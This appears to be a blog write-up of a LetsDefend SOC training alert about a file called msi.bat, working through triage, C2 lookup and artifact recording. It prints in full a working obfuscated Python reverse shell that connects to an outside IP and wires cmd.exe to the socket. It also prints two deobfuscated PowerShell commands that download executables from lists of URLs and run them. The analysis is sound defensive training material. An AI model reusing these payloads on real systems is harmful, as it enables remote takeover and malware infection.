4ensiX

I noticed that for the ones I had called FP, I did select FP, but the display shows TP.

LetsDefend level 1 alert SOC132 - Same Malicious File Found on Multiple Sources event-id 68

Details

EventID: 68
Event Time: March 1, 2021, 3:16 p.m.
Rule: SOC132 - Same Malicious File Found on Multiple Sources
Level: Security Analyst
Source Address 172.16.17.14
Source Hostname MikeComputer, JohnComputer, Sofia
File Name msi.bat
File Hash 3dc649bc1be6f4881d386e679b7b60c8
File Size 2,12 KB
Device Action Cleaned
Download (Password:infected): 3dc649bc1be6f4881d386e679b7b60c8.zip

Playbook

Define Threat Indicator

Answer: Other

Check if the malware is quarantined/cleaned

First, about msi.bat:

$ cat msi.bat 
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('81.68.99.93', 443)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

I thought it looked familiar: this is the same Python code that also appeared in the WMI abuse case, LetsDefend level 1 alert SOC134 - Suspicious WMI Activity event-id 71 - 4ensiX.
I did not notice it last time, but looking at a reverse shell cheat sheet:

Windows only
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.0.0.1', 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
PayloadsAllTheThings/Reverse Shell Cheatsheet.md at master · swisskyrepo/PayloadsAllTheThings · GitHub

In other words, this is the standard Windows Python reverse shell.
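A small triage helper for exactly this comparison, added here and not part of the original post or of the cheat sheet: it pulls the C2 host and port and the spawned program out of a Python reverse-shell one-liner and fingerprints the remainder, so that msi.bat and the PayloadsAllTheThings entry hash to the same template. The payload strings inside are constructed, heavily shortened stand-ins, not the full one-liners.

```python
import hashlib
import re

# Where the one-liner dials out and what program it wires to the socket
CONNECT_RE = re.compile(r"connect\(\('([^']+)',\s*(\d+)\)\)")
SHELL_RE = re.compile(r"Popen\(\['([^']+)'")

def extract_c2(payload: str):
    """Return (host, port) from the s.connect((...)) call, or None."""
    m = CONNECT_RE.search(payload)
    return (m.group(1), int(m.group(2))) if m else None

def spawned_shell(payload: str):
    """Return the program handed to subprocess.Popen, or None."""
    m = SHELL_RE.search(payload)
    return m.group(1).replace("\\\\", "\\") if m else None  # un-escape the Python literal

def normalize(payload: str) -> str:
    """Blank out the C2 tuple so the rest of the payload can be compared."""
    return CONNECT_RE.sub("connect(('<HOST>', <PORT>))", payload)

def template_fingerprint(payload: str) -> str:
    """SHA-256 of the normalized payload: identical for every host/port variant."""
    return hashlib.sha256(normalize(payload).encode()).hexdigest()

def same_template(a: str, b: str) -> bool:
    return template_fingerprint(a) == template_fingerprint(b)

# Constructed, heavily shortened stand-ins for the cheat-sheet entry and for
# msi.bat: only the connect tuple differs, exactly as in the two full one-liners.
CHEATSHEET = (
    "C:\\Python27\\python.exe -c \"(lambda __g: [s.connect(('10.0.0.1', 4242)) "
    "for __g['p'] in [subprocess.Popen(['\\\\windows\\\\system32\\\\cmd.exe'])] "
    "for __g['s'] in [socket.socket()]])\""
)
MSI_BAT = CHEATSHEET.replace("'10.0.0.1', 4242", "'81.68.99.93', 443")
```

Feeding the two full one-liners from above to these functions gives the same result: the fingerprints match and only extract_c2 differs.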

Endpoint Security

MikeComputer

CMD History

2020-08-29 10:29: powersheLL -e [base64-encoded command omitted; decoded below]

decode->

$Wtur091=(('Q'+'dx')+('19m'+'9'));('n'+'ew-i'+'tem') $EnV:tEMp\wORD\2019\ -itemtype diReCTory;[NetServicePointManager]::"s`eCuRI`TYPRo`TOCoL" = ('tl'+('s'+'12')+(','+' tl')+('s'+'11, tl')+'s');$Gy47_4d = (('Y'+'85mi4v')+'td');$Kxfftiy=(('R'+'o1')+('9o'+'l6'));$Gv5yh3n=$env:temp+((('ur'+'1wor'+'d')+('u'+'r1'+'2019')+('u'+'r1'))-rEplACE([ChaR]117+[ChaR]114+[ChaR]49),[ChaR]92)+$Gy47_4d+(''+('ex'+'e'));$Bdfxe81=('Yd'+('_2p'+'c')+'9');$Enic9br=&('new-'+'obj'+'ect') nETwEBclIEnt;$Hq0yl0b=(('h'+'tt')+('p'+'://q')+('st'+'ri')+'de'+''+'c'+('om'+'/')+('img/'+'0/*')+('h'+'tt')+('p://tsk'+'g')+('earcom/'+'wp'+'-')+'co'+'nt'+'en'+('t/'+'up')+'l'+'oa'+'ds'+('/2'+'0')+('15'+'/06/p'+'z/*')+'ht'+('t'+'p'+'://ve')+('rmas'+'i')+'ya'+'ah'+('ic'+'o')+('m/'+'c'+'gi-bi'+'n/')+('8/*'+'http'+':')+('/'+'/ww')+('ww'+'e')+('bl'+'abor')+(''+'com')+'b'+'r/'+('a'+'vis')+'os'+('/'+'QI'+'U9/')+('*ht'+'t')+('p:'+'//')+('vin'+'ic'+'i')+('u'+'srange')+('l'+'c')+'om'+('/e'+'x')+('per'+'i'+'m'+'enta')+('l/VIhM'+'h1'+'/')+('*htt'+'p')+':'+('/'+'/'+'westvac')+(''+'com')+'/w'+('p-'+'co')+'nt'+'e'+'n'+'t/'+('G'+'OYx/*'+'htt')+('p'+'s:')+('//'+'v')+('ie'+'w')+('all'+'')+'e'+'u'+('/cgi-'+'b')+'in'+('/Sbh'+'ZP')+'9X'+'/')"S`pLIt"([char]42);$Kbtdvqv=(('B'+'1yu')+('g'+'at'));foreach($A37s8kp in $Hq0yl0b){try{$Enic9br"Down`L`o`AdfILE"($A37s8kp, $Gv5yh3n);$Mf2snr4=(('X'+'jipi')+'9'+'4');If ((&('Get'+'-Item') $Gv5yh3n)"l`enG`TH" -ge 31997) {&('Inv'+'oke'+'-Item')($Gv5yh3n);$Run43tw=(('Tvoj'+'g')+'18');break;$Mjjlqy9=('A'+('gl'+'i')+('f'+'ge'))}}catch{}}$Besrfz1=('D_'+'x'+('7'+'oj2'))

JohnComputer

CMD History
1: ping raw.githubusercontent.com
2: dir
3: dir /s
4: users
5: net user

Sofia

CMD History

2020-10-18 12:17: cd
2020-10-18 12:18: dir
2020-10-18 22:17: POwersheLL -ENCOD [base64-encoded command omitted; decoded below]

decode->

set-ITEM variABLe:kzeQlU  ([tYPe]('sY'+'sTEm'+'i'+'odIrECtOR'+'Y')  )  ;  set-vaRIaBLe  ('rFG25'+'4')  (  [TyPe]('SY'+'sTE'+'m'+'n'+'eTsER'+'ViCEpoiNT'+'m'+'ANagE'+'r') );   SeT-iteM ("vA"+"riA"+"Ble:4GMs") ([tYPe]('SYST'+'eM'+'nEt'+'S'+'E'+'C'+'U'+'ritYPRoTo'+'colTyPE') )  ; $Wuam7je=('W79h'+'p'+'7t');$I2hf0cw=$I23d6gy + [char](80 - 38) + $Lbzyf7j;$Z_lockk=('U'+'bzhdgl');  $kZEQlU::CREAtEdireCTOry($env:userprofile + (('O'+'TfW9'+'lu'+'danOTf'+'Av'+'gqkj3O'+'Tf')  -crEpLace  ([ChAr]79+[ChAr]84+[ChAr]102),[ChAr]92));$B7dtsyn=('Xz7'+'5vre');  (gi  ("v"+"aRIABle:R"+"fG254") )VALuE::SecuRiTYpRoTOCOl =   $4gMs::tLS12;$Q6ipuei=('L'+'fl4'+'rqh');$I53zimm = ('St'+'wk'+'31v');$Qxsnpra=('X1vj98'+'v');$Rccmnvg=('Mvd'+'c76h');$J09xaf2=$env:userprofile+(('{0}'+'W9ludan'+'{0}Avg'+'qkj3'+'{0'+'}')  -F [CHAR]92)+$I53zimm+('e'+'xe');$G948w6x=('D_'+'83'+'60m');$Ibcuoi8=neW-o`BJ`ECT NeTwebClIeNT;$Jvmmfy0=('ht'+'tp:'+'//'+'tud'+'or'+'in'+'ve'+'st'+'c'+'o'+'m/wp-ad'+'mi'+'n/rG'+'tnUb5f'+'/'+'*http'+':'+'//dp-wo'+'me'+'nba'+'s'+'ke'+'tc'+'om'+'/wp-'+'a'+'dm'+'in/'+'Li/'+'*'+'h'+'ttp://s'+'tylefixc'+'o/'+'guillo'+'t'+'i'+'ne-c'+'ro'+'s'+'s'+'/'+'C'+'TRNOQ/*http://ard'+'osco'+'mbr/sim'+'ulador/bPN'+'x/'+'*ht'+'tp'+':'+'//drtheu'+'relp'+'lasticsu'+'rge'+'ry'+'com/'+'g'+'en'+'eralo/rh'+'rhfl'+'v9'+'2/*'+'http://bodyinn'+'ovat'+'ion'+'coz'+'a/'+'wp'+'-c'+'ontent/2ss'+'Hv'+'i/*http://'+'nomadco'+'es'+'/wp-'+'ad'+'min/MvwVHCG/')SPLIT($Yyx1yj9 + $I2hf0cw + $Lc75n0q);$Nzaadzl=('Ldhnyp'+'v');foreach ($Pgpj9wa in $Jvmmfy0){try{$Ibcuoi8downLOAdFiLe($Pgpj9wa, $J09xaf2);$Gkehiri=('Z2'+'ru0'+'4x');If ((gE`T-`ITeM $J09xaf2)lEngTh -ge 26346) {([wmiclass]('win3'+'2_Proc'+'ess'))CreAte($J09xaf2);$Vjg9m1j=('Vkvb'+'vn'+'b');break;$Ivc6j6b=('Z'+'bnh2'+'6w')}}catch{}}$A56gpw8=('W'+'5'+'ogy0p')
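The two "decode->" steps above can be automated. The following decoder is an added example, not the author's tooling: it reverses -e / -ENCOD (base64 over UTF-16LE), folds the ('h'+'tt') concatenation, [ChaR] and -rEplACE tricks seen in both commands, and lists the '*'-separated download URLs. The encoded sample is constructed to mimic that structure with placeholder hostnames; it is not the real payload.

```python
import base64
import re

# Grammar fragments: single-quoted literals and [char]N casts joined with '+'
LIT = r"(?:'[^']*'|\[char\]\d+)"
TOKEN_RE = re.compile(r"'([^']*)'|\[char\](\d+)", re.I)
CONCAT_RE = re.compile(rf"{LIT}(?:\s*\+\s*{LIT})+", re.I)
PAREN_RE = re.compile(r"\(\s*('[^']*')\s*\)")
REPLACE_RE = re.compile(
    rf"\(\s*'([^']*)'\s*-(c?)replace\s*'([^']*)'\s*,\s*({LIT})\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"*]+", re.I)

def decode_encoded_command(b64: str) -> str:
    """-e / -ENCOD / -EncodedCommand carries base64 over UTF-16LE script text."""
    return base64.b64decode(b64).decode("utf-16-le")

def _literal(token: str) -> str:
    s, c = TOKEN_RE.fullmatch(token).groups()
    return chr(int(c)) if c else s

def _join(m: re.Match) -> str:
    return "'" + "".join(_literal(t) for t in re.findall(LIT, m.group(0), re.I)) + "'"

def _replace(m: re.Match) -> str:
    text, case_sensitive, pat, repl = m.group(1), m.group(2), m.group(3), _literal(m.group(4))
    # PowerShell -replace is a regex replace; -creplace is its case-sensitive form
    return "'" + re.sub(pat, lambda _: repl, text, flags=0 if case_sensitive else re.I) + "'"

def fold_concat(script: str) -> str:
    """Collapse ('h'+'tt')+'p' chains, [char]N casts and -replace tricks until
    nothing changes, exposing the literal strings the script builds at run time."""
    prev = None
    while prev != script:
        prev = script
        script = CONCAT_RE.sub(_join, script)
        script = PAREN_RE.sub(r"\1", script)
        script = REPLACE_RE.sub(_replace, script)
    return script

def extract_urls(script: str) -> list:
    """Download URLs hidden by concatenation and joined with '*' before the split."""
    return URL_RE.findall(fold_concat(script))

# Constructed sample (placeholder hosts, not the real payload) in the style of the
# decoded commands: a '*'-joined URL list and a drop path built via [char]/-replace.
SAMPLE_PS = (
    "$u=(('h'+'tt')+('p'+'://ex')+'ample'+'.'+('te'+'st/')+('a/*'+'http')"
    "+'s://'+('cdn.ex'+'ample.test/')+'b/').\"S`pLIt\"([char]42);"
    "$p=$env:temp+(('ur'+'1dir')-rEplACE([ChaR]117+[ChaR]114+[ChaR]49),[ChaR]92)+'x.exe'"
)
SAMPLE_B64 = base64.b64encode(SAMPLE_PS.encode("utf-16-le")).decode()
```

Running fold_concat over decode_encoded_command(SAMPLE_B64) yields the plain URL list and the path $env:temp+'\dirx.exe', which is the same shape as the two real commands once their dots are restored.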

Mike and Sofia clearly seem to have problems of their own, but I cannot tell whether they are related to this case. However,

Device Action Cleaned

so, at least for this case,
Answer: Quarantined should be fine.

Analyze Malware

msi.bat

VirusTotal: https://www.virustotal.com/gui/file/7538b8a61dd42c874e7e153dad02c528f06c397344e70de01fdc98a5c28030bf
We already know it is the standard reverse shell, so it is malicious either way. What about the destination it connects to, then?

81.68.99.93

VirusTotal: https://www.virustotal.com/gui/ip-address/81.68.99.93
AbuseIPDB: https://www.abuseipdb.com/check/81.68.99.93
ip-sc: https://ip-sc.net/ja/r/81.68.99.93
Reported as malicious. There were many reports of SSH login attempts from it.

Answer: Malicious

Check If Someone Requested the C2

Log Search shows no access to 81.68.99.93.
Answer: Not Accessed

Add Artifacts

Value                            | Type       | Comment
3dc649bc1be6f4881d386e679b7b60c8 | MD5 Hash   | python reverse shell script
81.68.99.93                      | IP Address | c2 server

End

close alert event id 68